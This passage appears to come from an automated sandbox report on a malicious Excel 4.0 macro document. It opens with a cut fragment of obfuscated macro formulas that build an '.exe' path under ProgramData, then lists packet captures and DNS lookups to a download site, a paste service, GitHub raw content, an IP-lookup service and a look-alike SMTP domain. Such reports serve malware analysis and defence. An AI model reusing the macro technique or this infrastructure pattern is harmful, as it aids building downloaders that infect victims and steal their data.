""""OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""""=FORMULA.FILL(D123&F123;B127)";"=FORMULA.FILL(D123&F125;C127)";;;;;;;"=FORMULA.FILL(D123&F124;B129)";"=FORMULA.FILL(D123&F124;C129)";;;;;;;;;;;=CLOSE(FALSE);=CLOSE(FALSE);;;;;;;

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:34:52.639247894 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.728754997 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.728857040 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.729995012 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.819730043 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822626114 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822662115 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822681904 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.822696924 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.822726965 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.839371920 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.929435968 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:52.929589033 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:52.930550098 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020528078 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020565987 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020591021 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020612955 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020631075 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020633936 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020654917 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020658016 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020677090 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020698071 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020699024 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020720005 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020729065 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020742893 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.020764112 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.020798922 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110246897 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110290051 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110332966 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110340118 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110371113 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110384941 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110419035 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110430956 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110510111 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110551119 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110583067 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110600948 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110618114 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110632896 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110657930 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110672951 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110698938 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110718012 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110749960 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110795021 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110797882 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110821962 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110833883 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110846996 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110874891 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110893965 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110915899 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110929966 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.110955954 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.110987902 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111020088 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111049891 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111092091 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.111099005 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.111129999 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.111176014 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200699091 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200731039 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200748920 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200766087 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200792074 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200838089 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200843096 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200896025 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200896025 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200912952 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200930119 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200939894 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.200947046 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.200982094 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201030970 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201036930 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201057911 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201075077 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201091051 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201093912 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201109886 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201124907 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201129913 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201142073 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201194048 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201199055 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201216936 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201234102 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201250076 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201252937 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201309919 CET	49731	443	192.168.2.4	185.162.146.6
Feb 22, 2021 20:34:53.201481104 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201500893 CET	443	49731	185.162.146.6	192.168.2.4
Feb 22, 2021 20:34:53.201518059 CET	443	49731	185.162.146.6	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:34:29.687860012 CET	61516	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:29.739490986 CET	53	61516	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:29.767420053 CET	49182	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:29.815984011 CET	53	49182	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:30.263438940 CET	59920	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:30.314961910 CET	53	59920	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.078226089 CET	57458	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.080617905 CET	50579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.082081079 CET	51703	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:31.126879930 CET	53	57458	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.130614996 CET	53	51703	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:31.131963015 CET	53	50579	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:34.316699028 CET	65248	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:34.365331888 CET	53	65248	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:34.720675945 CET	53723	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:34.783176899 CET	53	53723	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:35.302231073 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:35.350928068 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:36.280597925 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:36.329336882 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:36.805571079 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:36.864126921 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:37.923851967 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:37.976875067 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:39.346796989 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:39.397808075 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:40.696451902 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:41.707600117 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:42.722731113 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:42.771193027 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:47.367399931 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:47.418781996 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:48.501813889 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:48.560431004 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:48.929344893 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:48.982388973 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:49.017344952 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:49.106849909 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:50.018461943 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:50.080616951 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:51.020482063 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:51.077636003 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:52.415822029 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:52.524574041 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:52.576081038 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:52.636853933 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:53.035986900 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:53.093123913 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:53.546662092 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:53.595238924 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:54.636038065 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:54.684721947 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:55.715290070 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:55.766792059 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:56.700356960 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:56.753185987 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:57.155433893 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:57.213876963 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:34:57.856837034 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:34:57.905467033 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:00.789448977 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:00.838532925 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:01.642065048 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:01.693589926 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.390264988 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.486176968 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.495822906 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.543293953 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:02.654545069 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:02.705847025 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:03.489864111 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:03.539556980 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:04.643543005 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:04.692197084 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:05.419096947 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:05.470511913 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:24.897155046 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:24.950231075 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:26.430989027 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:26.490880966 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:26.674863100 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:26.723582983 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:45.741672993 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:45.800513983 CET	53	49612	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:45.854551077 CET	49285	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:45.903126001 CET	53	49285	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:46.288532972 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:46.339776993 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:55.892837048 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:56.932419062 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:56.989854097 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:56.991533995 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 20:35:57.158576965 CET	56448	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:35:57.207247972 CET	53	56448	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:04.702212095 CET	59172	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:04.763225079 CET	53	59172	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:26.419395924 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.475675106 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.662655115 CET	53	62420	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:27.767416954 CET	60579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:27.954674006 CET	53	60579	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.208513975 CET	50183	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:30.270618916 CET	53	50183	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.389144897 CET	61531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:30.446027040 CET	53	61531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.964181900 CET	49228	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:31.027055979 CET	53	49228	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:31.684195042 CET	59794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:31.741703987 CET	53	59794	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:32.248416901 CET	55916	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:32.308609962 CET	53	55916	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:32.781590939 CET	52752	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:32.842658043 CET	53	52752	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:33.457366943 CET	60542	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:33.516851902 CET	53	60542	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:34.382621050 CET	60689	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:34.444055080 CET	53	60689	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:35.435549021 CET	64206	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:35.495372057 CET	53	64206	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:36.516894102 CET	50904	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:36.574115038 CET	53	50904	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:37.390105009 CET	57525	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:37.447454929 CET	53	57525	8.8.8.8	192.168.2.4
Feb 22, 2021 20:37:00.909001112 CET	53814	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:37:00.969053984 CET	53	53814	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 22, 2021 20:35:56.991658926 CET	192.168.2.4	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 20:34:52.415822029 CET	192.168.2.4	8.8.8.8	0x8967	Standard query (0)	www.seyranikenger.com.tr	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.390264988 CET	192.168.2.4	8.8.8.8	0xfa17	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.654545069 CET	192.168.2.4	8.8.8.8	0x1e8b	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.430989027 CET	192.168.2.4	8.8.8.8	0x304	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.674863100 CET	192.168.2.4	8.8.8.8	0x5c3d	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.741672993 CET	192.168.2.4	8.8.8.8	0xdabe	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.854551077 CET	192.168.2.4	8.8.8.8	0xfeb3	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:55.892837048 CET	192.168.2.4	8.8.8.8	0x8561	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.932419062 CET	192.168.2.4	8.8.8.8	0x8561	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.158576965 CET	192.168.2.4	8.8.8.8	0xb744	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:26.419395924 CET	192.168.2.4	8.8.8.8	0x2f9f	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.475675106 CET	192.168.2.4	8.8.8.8	0x2f9f	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.767416954 CET	192.168.2.4	8.8.8.8	0xb879	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 22, 2021 20:34:52.636853933 CET	8.8.8.8	192.168.2.4	0x8967	No error (0)	www.seyranikenger.com.tr	seyranikenger.com.tr		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:34:52.636853933 CET	8.8.8.8	192.168.2.4	0x8967	No error (0)	seyranikenger.com.tr		185.162.146.6	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.495822906 CET	8.8.8.8	192.168.2.4	0xfa17	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.490880966 CET	8.8.8.8	192.168.2.4	0x304	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.220.115	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.48.44	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.140.41	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.252.4	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.189.250	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.96.218	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.76.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.220.115	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.48.44	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.140.41	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.252.4	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.189.250	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.96.218	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.76.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.989854097 CET	8.8.8.8	192.168.2.4	0x8561	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.991533995 CET	8.8.8.8	192.168.2.4	0x8561	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
